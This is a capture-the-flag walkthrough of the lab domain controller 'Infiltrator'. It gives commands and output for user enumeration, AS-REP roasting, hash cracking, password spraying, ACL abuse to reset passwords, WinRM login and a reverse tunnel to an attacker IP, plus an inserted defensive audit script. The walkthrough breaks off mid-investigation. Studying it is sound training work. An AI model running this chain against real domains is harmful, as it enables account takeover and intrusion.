Infiltrator

Recon & Enum

Nmap Scan

PORT      STATE SERVICE       VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Infiltrator.htb
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-14 00:14:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
|_ssl-date: 2024-11-14T00:17:40+00:00; -13m04s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-14T00:17:40+00:00; -13m04s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-14T00:17:40+00:00; -13m04s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Issuer: commonName=infiltrator-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-04T18:48:15
| Not valid after: 2099-07-17T18:48:15
| MD5: edac:cc15:9e17:55f8:349b:2018:9d73:486b
|_SHA-1: abfd:2798:30ac:7b08:de25:677b:654b:b704:7d01:f071
|_ssl-date: 2024-11-14T00:17:40+00:00; -13m04s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Issuer: commonName=dc01.infiltrator.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-30T13:20:17
| Not valid after: 2025-01-29T13:20:17
| MD5: be1d:a071:bf6d:fff0:20c0:6b23:8e7e:1763
|_SHA-1: cbda:6e22:6ccf:b5e7:534c:b9f0:d9e7:c5d8:dab9:769e
|_ssl-date: 2024-11-14T00:17:40+00:00; -13m04s from scanner time.
| rdp-ntlm-info:
| Target_Name: INFILTRATOR
| NetBIOS_Domain_Name: INFILTRATOR
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: infiltrator.htb
| DNS_Computer_Name: dc01.infiltrator.htb
| DNS_Tree_Name: infiltrator.htb
| Product_Version: 10.0.17763
|_ System_Time: 2024-11-14T00:17:00+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
15220/tcp open unknown
15230/tcp open unknown
49666/tcp open msrpc Microsoft Windows RPC
49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49691/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49723/tcp open msrpc Microsoft Windows RPC
49736/tcp open msrpc Microsoft Windows RPC
49877/tcp open msrpc Microsoft Windows RPC

DNS

This can be left running in the background; if later enumeration turns up something new, it can simply be interrupted.

gobuster dns -w /usr/share/seclists/Discovery/DNS/n0kovo_subdomains.txt -d infiltrator.htb -o log/dns.log -r infiltrator.htb

Web Dir

This can be left running in the background; if later enumeration turns up something new, it can simply be interrupted.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt -o log/web_dir.log -u http://infiltrator.htb/

RPC

rpcclient infiltrator.htb -U 'guest%'

LDAP

ldapsearch -x -H ldap://infiltrator.htb -s base

SMB

netexec smb infiltrator.htb -u guest -p '' --shares
netexec smb infiltrator.htb -u guest -p '' --rid-brute 10000

Shell as M.Harris

Team members are listed on the web page; save their names.

David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez

Generate username combinations from the names and enumerate valid usernames with kerbrute.

kerbrute userenum --dc infiltrator.htb -d infiltrator.htb info/dic_user.list -o log/kerbrute_username.log
---
...
2024/11/14 20:30:39 > [+] VALID USERNAME: D.Anderson@infiltrator.htb
2024/11/14 20:30:39 > [+] VALID USERNAME: O.Martinez@infiltrator.htb
2024/11/14 20:30:39 > [+] VALID USERNAME: K.Turner@infiltrator.htb
2024/11/14 20:30:39 > [+] VALID USERNAME: A.Walker@infiltrator.htb
2024/11/14 20:30:39 > [+] VALID USERNAME: M.Harris@infiltrator.htb
2024/11/14 20:30:40 > [+] VALID USERNAME: E.Rodriguez@infiltrator.htb
2024/11/14 20:30:40 > [+] VALID USERNAME: L.Clark@infiltrator.htb
2024/11/14 20:30:45 > Done! Tested 77 usernames (7 valid) in 5.990 seconds

AS-REP Roasting

impacket-GetNPUsers -no-pass -usersfile info/user.list infiltrator.htb/
---
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] User D.Anderson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User O.Martinez doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User K.Turner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User A.Walker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User M.Harris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User E.Rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$L.Clark@INFILTRATOR.HTB:59de0be66010a9b1a6d556b9dc40655c$c0a83a0c13c9d3c93845780d212b475ab9dfd03664fc96389a5b4a8a7b72b876309ec91711f79d884f88093518c1fd7c6c392ff1c56cc9b2b6f4b84902023c9fbc1ffb31d19fb65cbefebad093167c7ae1b7939e3b049f0efc404dfd0be057341484c578620f33ba407c998d20897e29bc56ec1c178b07c6bc6132c7b8aa4cc2001b6ccc0e994d78b9427f96c1329a078858eb8300170ad0bf6d5efcce373b3faa17939f71118d1832079db985a6c39904407c5d7e8706798bef1d2b5230a359fdba5303a11367b052af688630da080db393c07064a69fffd715a4c7bbe8533e3b48bfe5c344cb693f0cf79a505f744d8ef3
  • Identify the hash type
nth -f info/KRB_AS_REP.hash
---
...
Kerberos 5 AS-REP etype 23, HC: 18200 JtR: krb5pa-sha1 Summary: Used for Windows Active Directory
...
  • Crack it with Hashcat
hashcat -m 18200 info/KRB_AS_REP.hash /usr/share/wordlists/rockyou.txt
---
...
$krb5asrep$23$L.Clark@INFILTRATOR.HTB:65969ff15f18ac84bd58a6185f7ccd24$93a0a81d05fc4e025b62fd665a350fdfbd750f4e7af34c2bd222ab727fd4a7fa5633c3dde88ed20df3ba406637168e9b45fcf9397784039601cac294c2ecd8cb6b24efec7ee83bece85a0a1a98f2852698284b8912e88fae047d9fdd9c88dfdbccf44c61eaa50427a5415260ebfe26f3db3c2a1efc996a2d92086589f515383854ae3502f0834e0da01ca5d20783d4a6ba3cd6019163df47c291bd99950e16deafa5bf5d7ccc39cfab61c5b71912b9aed41b259c708945e2b51c7d5fb5f7d0dae3cc955efa7ac9569ce98181e306ebc3834a1dd97817e9d6c03f4dfff165f526cc2b2a4b72c418b68cc6ccae4783cb73bd31:WAT?watismypass!
...

Credentials obtained: L.Clark : WAT?watismypass!

LDAP User Enum

netexec ldap infiltrator.htb -u 'L.Clark' -p 'WAT?watismypass!' --users

This returns a description on the K.Turner account that looks like a password; save it for now: MessengerApp@Pass!
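The two findings so far (L.Clark with Kerberos pre-authentication disabled, and K.Turner with a credential sitting in the description attribute) are both visible in the same LDAP attributes, so a defender can audit for them in one pass. The Python below is an added example, not part of this writeup or of netexec/impacket: it runs over constructed user records that mirror the sAMAccountName, userAccountControl and description attributes, and flags both conditions; the credential-text regexes are a hand-tuned heuristic, not a standard.

```python
import re

# userAccountControl bits (values from Microsoft's documentation of the attribute)
ACCOUNTDISABLE = 0x0002
UF_PASSWD_NOTREQD = 0x0020
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Bits that warrant a finding, reported in this order
UAC_RISKY = {
    UF_DONT_REQUIRE_PREAUTH: "AS-REP roastable (pre-auth disabled)",
    UF_PASSWD_NOTREQD: "password not required",
    UF_DONT_EXPIRE_PASSWD: "password never expires",
}

# Heuristics (assumption, hand-tuned): a 6+ char token containing pass/pwd plus a
# digit or symbol, or an 8+ char token mixing letters, digits and symbols.
_KEYWORD_TOKEN = re.compile(r"(?=\S*(?i:pass|pwd))(?=\S*[\d!@#$%^&*?=:])\S{6,}")
_STRONG_TOKEN = re.compile(r"(?=\S*[A-Za-z])(?=\S*\d)(?=\S*[^\w\s])\S{8,}")


def credential_like(text):
    """True if a free-text attribute (description, info) looks like it embeds a password."""
    if not text:
        return False
    return bool(_KEYWORD_TOKEN.search(text) or _STRONG_TOKEN.search(text))


def audit_user(user):
    """Findings for one record: sAMAccountName, userAccountControl (int), description."""
    findings = []
    uac = int(user.get("userAccountControl", 0))
    if uac & ACCOUNTDISABLE:
        return findings  # a disabled account can neither be roasted nor logged into
    for bit, label in UAC_RISKY.items():
        if uac & bit:
            findings.append(label)
    if credential_like(user.get("description")):
        findings.append("credential-like text in description")
    return findings


def audit(users):
    """Map sAMAccountName -> findings, omitting accounts with nothing to report."""
    return {u["sAMAccountName"]: f for u in users if (f := audit_user(u))}


# Constructed sample records modelled on the accounts seen in this writeup
SAMPLE_USERS = [
    {"sAMAccountName": "L.Clark", "userAccountControl": 0x400200, "description": None},
    {"sAMAccountName": "K.Turner", "userAccountControl": 0x200, "description": "MessengerApp@Pass!"},
    {"sAMAccountName": "D.Anderson", "userAccountControl": 0x200, "description": "Marketing Digital"},
    {"sAMAccountName": "svc_old", "userAccountControl": 0x410202, "description": "pwd=Winter2019!"},
]
```

`audit(SAMPLE_USERS)` reports only L.Clark (pre-auth disabled) and K.Turner (credential in description); the disabled svc_old record is skipped even though it would otherwise trip both rules.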

Password Spraying

kerbrute passwordspray -d infiltrator.htb --dc 10.10.11.31 info/user.list 'WAT?watismypass!'
kerbrute passwordspray -d infiltrator.htb --dc 10.10.11.31 info/user.list 'MessengerApp@Pass!'

Two users share this password, so enumerate the shares again.

netexec smb infiltrator.htb -u info/user.list -p 'WAT?watismypass!' --shares

Only L.Clark has accessible shares.

SMB

Use the spider module to pull the share's file listing down locally.

netexec smb infiltrator.htb -u L.Clark -p 'WAT?watismypass!' -M "spider_plus"

Nothing stands out from the names and sizes of the shared files; each one could also be inspected individually.

WinRM

netexec winrm infiltrator.htb -u info/user.list -p info/pass.list

WinRM login fails.

BloodHound

bloodhound-python -c all --zip -dc 'infiltrator.htb' -ns '10.10.11.31' -d 'infiltrator.htb' -u 'L.Clark' -p 'WAT?watismypass!'

Look at the high-value paths.

This path yields control of M.Harris, which allows a remote login to the machine and a user shell.

First, change E.Rodriguez's password.

# Get a TGT for D.Anderson
impacket-getTGT 'infiltrator.htb'/'D.Anderson':'WAT?watismypass!'

# Grant FullControl on the OU
KRB5CCNAME=D.Anderson.ccache /usr/share/doc/python3-impacket/examples/dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'D.Anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb'/'D.Anderson':'WAT?watismypass!' -dc-ip dc01.infiltrator.htb -k -no-pass

bloodyAD --host "dc01.infiltrator.htb" -d 'infiltrator.htb' -u 'D.Anderson' -p 'WAT?watismypass!' -k --dc-ip '10.10.11.31' set password 'E.Rodriguez' 'Admin@123'

Then E.Rodriguez adds themself to the Chiefs Marketing group.

bloodyAD --host "dc01.infiltrator.htb" -d 'infiltrator.htb' -u 'E.Rodriguez' -p 'Admin@123' -k --dc-ip '10.10.11.31' add groupMember 'Chiefs Marketing' 'E.Rodriguez'

Next, change M.Harris's password.

bloodyAD --host "dc01.infiltrator.htb" -d 'infiltrator.htb' -u 'E.Rodriguez' -p 'Admin@123' -k --dc-ip '10.10.11.31' set password 'M.Harris' 'Admin@123'

Now the M.Harris account can be used to log in remotely.

Connecting directly does not work; Kerberos ticket authentication is required.

impacket-getTGT 'infiltrator.htb'/'M.Harris':'Admin@123'
KRB5CCNAME=M.Harris.ccache evil-winrm -i 'dc01.infiltrator.htb' -u 'M.Harris' -p 'Admin@123' -r 'infiltrator.htb'

It still errors, and the message also hints that the username and password can be omitted. The cause is that no KDC can be located for the realm INFILTRATOR.HTB, so /etc/krb5.conf needs to be edited.

[libdefaults]
    default_realm = INFILTRATOR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
    forwardable = true

[realms]
    INFILTRATOR.HTB = {
        kdc = dc01.infiltrator.htb
        admin_server = dc01.infiltrator.htb
    }

[domain_realm]
    .infiltrator.htb = INFILTRATOR.HTB
    infiltrator.htb = INFILTRATOR.HTB

Try logging in again.

KRB5CCNAME=M.Harris.ccache evil-winrm -i 'dc01.infiltrator.htb' -r 'infiltrator.htb'

Shell obtained. For convenience, a Havoc agent is brought up on the host, and WinPEAS is then used to enumerate local privilege-escalation paths.

Shell as Administrator

WinPEAS shows several services listening on 14*** ports; forward those 14*** ports to the local machine.

shell c.exe client -v 10.10.16.44:8080 R:0.0.0.0:14406:127.0.0.1:14406 R:0.0.0.0:14118:127.0.0.1:14118 R:0.0.0.0:14122:127.0.0.1:14122 R:0.0.0.0:14123:127.0.0.1:14123 R:0.0.0.0:14125:127.0.0.1:14125 R:0.0.0.0:14126:127.0.0.1:14126 R:0.0.0.0:14127:127.0.0.1:14127 R:0.0.0.0:14128:127.0.0.1:14128 R:0.0.0.0:14130:127.0.0.1:14130

Scan these ports for service information.

nmap --min-rate 1000 -T4 -sV -p 14406,14130,14128,14118,14126,14127,14125,14122,14123 127.0.0.1
---
PORT STATE SERVICE VERSION
14118/tcp open ssl/unknown
14122/tcp open unknown
14123/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
14125/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
14126/tcp open http Apache httpd 2.4.9 ((Win32) PHP/5.5.12)
14127/tcp open unknown
14128/tcp open unknown
14130/tcp open unknown
14406/tcp open mysql MySQL 5.5.5-10.1.19-MariaDB

Try MySQL first.

It prompts for a password; try the MessengerApp@Pass! credential that has not been used yet.

Still wrong. Look at the HTTP services instead, starting with 14123.

The description found earlier on the K.Turner account is the Output Messenger password.

Some chat history is found, but nothing useful; check the other two ports.

Nothing there either. Search for known Output Messenger vulnerabilities.

This MySQL instance loads its configuration from C:\Program Files\Output Messenger Server\Plugins\Output\mysql\my.ini

But this directory cannot be accessed. Going back to the WinPEAS output, some subdirectories inside it are accessible.

Accessing them fails as well, so look for sensitive files elsewhere under this directory.